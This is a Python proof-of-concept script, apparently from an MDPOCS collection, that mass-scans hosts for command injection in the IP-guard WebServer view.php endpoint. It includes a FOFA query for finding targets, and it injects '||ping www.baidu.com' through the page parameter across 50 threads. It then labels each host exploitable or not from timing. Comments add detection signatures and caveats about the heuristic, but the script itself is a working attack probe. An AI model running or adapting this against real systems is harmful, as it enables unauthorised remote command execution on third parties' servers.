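#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:MDSEC
# from:https://github.com/MD-SEC/MDPOCS
# fofa:"IP-guard" && icon_hash="2030860561"
#
"""Timing-based check for command injection in the IP-guard WebServer view.php endpoint.

The script reads hosts from the first column of a CSV/text file and sends one
GET request per host to
``/ipg/static/appr/lib/flexpaper/php/view.php`` with a ``page`` parameter that
carries ``||ping www.baidu.com``. It then classifies the host from the HTTP
status code and the response time only; it never reads the response body.

Notes for anyone using or detecting this check:

* The check is not passive. On a host where the parameter reaches a shell, the
  ``ping`` command actually runs on the server and produces outbound traffic.
* The verdict is a heuristic. Network latency alone can put a response in the
  2-6 second window, and a plain HTTP 200 says nothing about command execution.
* In web server access logs, a request to the view.php path above whose
  ``page`` value contains ``||`` is the signature of this probe.
"""
import sys
import requests
import csv
import urllib3
import hashlib
from concurrent.futures import ThreadPoolExecutor
import time

# Usage banner: the script takes exactly one argument, the hosts file.
if len(sys.argv) != 2:
    print(
        '+----------------------------------------------------------------------------------------------------------+')
    print(
        '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS +')
    print(
        '+-------------------------------------------------------------------------------------------------- -------+')
    print(
        '+ USE: python3 <filename> <hosts.txt> +')
    print(
        '+ EXP: python3 Ip_Guard_Webserver_View_Rce_Poc.py url.txt +')
    print(
        '+-------------------------------------------------------------------------------------------------- --------+')
    sys.exit()

# Not referenced anywhere in this script; kept because it is a module-level name.
proxysdata = {
    'http': ''
}


def poc(host):
    """Send the view.php probe to *host* and print a timing-based verdict.

    Args:
        host: Host name, ``host:port`` or full ``http(s)://`` URL.

    Returns:
        ``None`` when a response was received (the verdict is printed),
        ``0`` when the request itself failed.
    """
    # Test for a real scheme prefix. A substring test would treat a bare host
    # name that merely contains "http" as a full URL and build a broken request.
    if host.startswith(("http://", "https://")):
        url = host
    else:
        url = "http://" + host
    host1 = url.replace("http://", "")
    host2 = host1.replace("https://", "")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate, br",
        "Host": "%s" % host2
    }
    # The `page` parameter carries `||` followed by a command. This path plus
    # that parameter shape is what shows up in the server's access log.
    vulurl = url + "/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20www.baidu.com"
    try:
        start_time = time.time()
        # Bounded wait: without a timeout one unresponsive host blocks a worker
        # thread forever. 10 s stays above the 6 s upper bound tested below.
        r = requests.get(vulurl, headers=headers, timeout=10)
        end_time = time.time()
        response_time = end_time - start_time
    except requests.RequestException:
        # Connection, TLS and timeout failures are reported rather than
        # silently dropped (the original print sat after the return).
        print(host + ":false")
        return 0

    if r.status_code == 200 and response_time > 2 and response_time < 6:
        # "definitely exploitable": 200 plus a delay consistent with ping running.
        # NOTE(review): a slow link produces the same delay; confirm by other means.
        print(host+" :一定能打")
    elif r.status_code == 200:
        # "probably exploitable": only says the path answered 200.
        # NOTE(review): weak signal, expect false positives.
        print(host+" :大概率能打")
    else:
        # "not exploitable": the endpoint did not return 200.
        print(host+" :不能打")


if __name__ == '__main__':
    file = sys.argv[1]
    # The context manager closes the hosts file even if reading fails.
    with open(file, newline="") as data:
        reader = csv.reader(data)
        with ThreadPoolExecutor(50) as pool:
            for row in reader:
                # Blank lines yield empty rows; row[0] would raise IndexError.
                if not row or not row[0].strip():
                    continue
                pool.submit(poc, row[0].strip())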
Unavailable Temp Solutions
Unavailable Official solution
Unavailable Defense Solutions